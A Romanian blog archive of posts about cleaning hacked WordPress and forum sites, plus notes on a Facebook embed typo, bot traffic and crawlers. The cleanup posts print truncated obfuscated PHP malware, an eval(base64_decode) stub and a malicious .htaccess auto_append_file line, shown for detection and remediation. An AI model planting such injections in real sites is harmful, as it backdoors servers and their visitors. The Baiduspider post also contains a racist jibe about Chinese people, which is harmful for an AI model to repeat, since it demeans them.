Category Archives: Crawl, Hack si răutați

WordPress 3.2.1 spart prin fisierele temei

Titlul este pompos ca in ziare si reviste. Pana la urma WordPress-ul a fost spart prin intermediul unei teme (theme, layout, sablon etc, cum ii zice fiecare). Aveam pe server mai multe teme gratuite oferite de mai multe site-uri (printre care si woothemes.com) si foloseam doar cateva dintre ele. Si prin una din ele, s-a putut intra si incarca pe server fisier cu cod PHP.

Orice programator mai rasarit – care mai face cracking, hacking – stie ca in momentul in care poti pune un fisier PHP pe un server, poti face multe pornind de acolo. Depinde ce doresti sa faci.

METODE

Am incercat sa astup groapa sapata de hacker si am folosit mai multe metode:

  • restaurarea fisierelor din back-up oferit de hosting
  • cautare de fisiere index.php si vizualizarea codului de la finalul fisierului
  • stergerea fisierelor ciudate de pe server (ex: Thumbs.db)
  • reinstalare de WordPress si alte site-uri
  • cautare de texte prin baza de date

.htacces
Blogurile dadeau un mesaj ciudat in burtiera:

PHP Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0
PHP Fatal error: Unknown: Failed opening required '/home/abcdefg/public_html/abcdefgh/Thumbs.db' (include_path='.:/usr/lib/php:/usr/local/lib/php') in Unknown on line 0

Am reinstalat, am cautat si… nimic. Pana la urma hackerul se bagase in “.htaccess” si a adaugat linia de mai jos

php_value auto_append_file /home/abcdefg/public_html/abcdefg/Thumbs.db

deci degeaba cautam in codul php, caci era folosita metoda “auto_append_file”.

Succes la cei care au gropi de astupat!

Servere cu forumuri, wordpress-uri sparte de hackeri

In luna noiembrie 2011 am intalnit un server spart de hackeri. Pe scurt, fisierele index.php au fost editate si la final li s-a adaugat o linie lunga, ce contine urmatoarele linii (am taiat un pic din cârnații de caractere, pentru a nu pune codul în totalitate):

if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdl...";
$eva1tYldakBcVSir = "x73164x72162x65...";
$eva1tYldakBoVS1r = "x65143x61154x70...";
$eva1tYidokBoVSjr = "x3b51x29135x31...";
$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "x73164x72x65143x72160164x72";
$eva1tYlbakBcVSir = "x67141x6f133x70170x65";
$eva1tYldakBoVS1r = "x65143x72160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}
*/

Codul de mai sus nu functioneaza impreuna cu inca un fisier – numit Thumbs.db – si situat in acelasi director. Exempu de cod din acest fisier:

eval(base64_decode("aWYgKCRldmFsSnlDZUxxSXN0WG9wdWggIT0gNjQ4NzIpIHtmdW5jdGlvbiBldmFsV3FmR0RMSk...
Continue reading »

Buton Like de la Facebook, cu cod HTML gresit

In site-ul Facebook, in pagina de ajutor, exista instructiuni despre “Cum sa adaugi un buton Like la tine in site“. Numai ca codul HTML dat ca si exemplu de facebook.com este dat gresit: tagul iframe nu este inchis.

Cod gresit (de la Facebook):

<html>
    <head>
      <title>My Great Web page</title>
    </head>
    <body>
       <iframe src="http://www.facebook.com/plugins/like.php?href=YOUR_URL"
        scrolling="no" frameborder="0"
        style="border:none; width:450px; height:80px"><iframe>
    </body>
 </html>

Pentru exemplul dat de ei, codul HTML corect este:

<html>
    <head>
      <title>My Great Web page</title>
    </head>
    <body>
       <iframe src="http://www.facebook.com/plugins/like.php?href=YOUR_URL"
        scrolling="no" frameborder="0"
        style="border:none; width:450px; height:80px"></iframe>
    </body>
 </html>

Succes la modificat!

Goana SEO si cum poti sa iti frigi site-ul

Toata lumea e innebunita dupa SEO. “Vreau SEO” este pe buzele tuturor, “Vreau pe prima pagina”, “De ce nu apar o data?”.

Google este o firma privata, care te adauga dupa criterilor lor interne. La fel ca si Bing, ca si Yahoo si multe alte motoare de cautare. Doar ei cunosc formula de calcul si cum sa te pozitioneze. Cine ofera consultanta SEO, are o baza de cunostinte despre acest coeficient si poate forta repozitionarea prin aplicarea mai multor actiuni asupra site-ului.

La un client cu peste 1000 de vizitatori zilnici, am gasit multe referinte (referrer) in statistica, de la un site romanesc care genereaza trafic. Ceea ce nu stie clientul ca acest trafic este generat de roboti. Este bine ca traficul creste, fie el generat prin software manual.

Partea proasta este cand acest site generator de trafic, are virusi. Doar Google va sti daca va “parfuma” negativ site-ul clientului, daca generatorul de trafic este considerat “malware”. http://www.google.com/support/websearch/bin/answer.py?hl=en&answer=45449

La o analiza a site-ului generator de trafic, am gasit:
– foloseste “10 mii de statistici”: alexa.com, trafic.ro, statistics.ro, wta.ro, gtop.ro, extremetracking.com, google analytics
– include scripturi de la imvisible.ro, tradeads.eu si date-me.ro

Cand unele din aceste scripturi javascript sunt “hackuite”, site-ul tau va propaga hackingul, servind vizitatorului scripturi ce incerca tot felul de chestii: instalare de plug-in-uri, executie de java applet-uri, accesare de conturi paypal.com.

Firef0x-ul 3.6 a stiut sa ceara permisiuni de instalare si sa blocheze applet-urile, dar ce se face un user care si-a dat peste cap setarile de securitate? Se viruseaza si suna apoi un prieten.

exception: java.security.AccessControlException: access denied (java.util.PropertyPermision user.home read).

Succes la devirusat!

Despre virusul TrojanClicker Iframe

In ultimele luni a aparut un nou mod de hacking de site-uri: instalarea in ele de iFrame-uri, prin scripturi javascript. Ultima versiune pe care a trebuit sa o scot a fost TrojanClicker.Iframe.GT.gen trojan. Aceasta era instalat intr-un fisier index.php al unui site. Atacul de azi a venit din Singapore de la hostul 203.116.63.121

Ce modifica astfel de virus si cum se instaleaza in site?

Virusul modifica fisierele cu denumiri cheie: “index.php”, “login.php”, “index.html”, “config.php” etc.
Modificarea fisierelor se face prin download + modificare + upload prin FTP. Deci modifica parola de FTP daca esti virusat!

Ce trebuie sa faci ca sa scoti astfel de virusi dintr-un site?

  • schimba parolele de FTP. (Este o solutie pana la urmatoarea versiune de virus)
  • schimba parolele de MySQL. Daca aveau acces la FTP, deci pot citi si fisiere de configurare de la baza de date.
  • copiaza fisierele site-ului pe server dintr-un back-up. Daca nu ai back-up, fa-ti!
  • urmareaste log-ul de FTP pentru a gasi hostul de unde s-a instalat si blockeaza-l prin .htaccess
  • pune-ti intrebari de genul: “Cum de a aflat parola de FTP instalatorul virusului?”

Exemple ale actionarii virusilor de tip “IFrame”

– codul inserat exporta PDF-uri care exploateaza bug-uri ale Acrobat Reader-ului
– codul javascript deschide site-uri de cumparaturi
– functiile virusilor contin denumire de genul: “tmp_lkojfghx”, “base64_decode(‘aWYoaXNzZXQ”. Cauta toate fisierele care ar putea contine astfel de cuvinte si inlocuieste-le cu unele “curate”, dintr-un back-up.

China ataca prin roboti de indexare

Azi am gasit in statistici zeci de hosturi de genul 123.125.66.* si am cautat ce robot foloseste clasa aceasta. Este un chinez pe nume Baiduspider. Este suspectat ca ar fii japonez, cert este ca are ochii mici.

Baiduspider is a Baidu search engine automatic procedure. Its function is visits on the Internet the html homepage, establishes the index database, enables the user to search the expensive website in the Baidu search engine the homepage.

Why does baiduspider massively visit my homepage?
After baiduspider visits your homepage, can on the automated analysis each homepage writing content and the memory homepage website, then other 网友 can find your homepage through hundred search engines. If baiduspider does not visit your homepage, then possesses through baiduspider provides the homepage information the search engine all not to be able to find your homepage, in other words, other 网友 and so on several dozens search the website in hundred souhu.com Sina Yahoo! Tom to be able not to be able to find your homepage. You may arrive here further to understand the search engine.

Continue reading »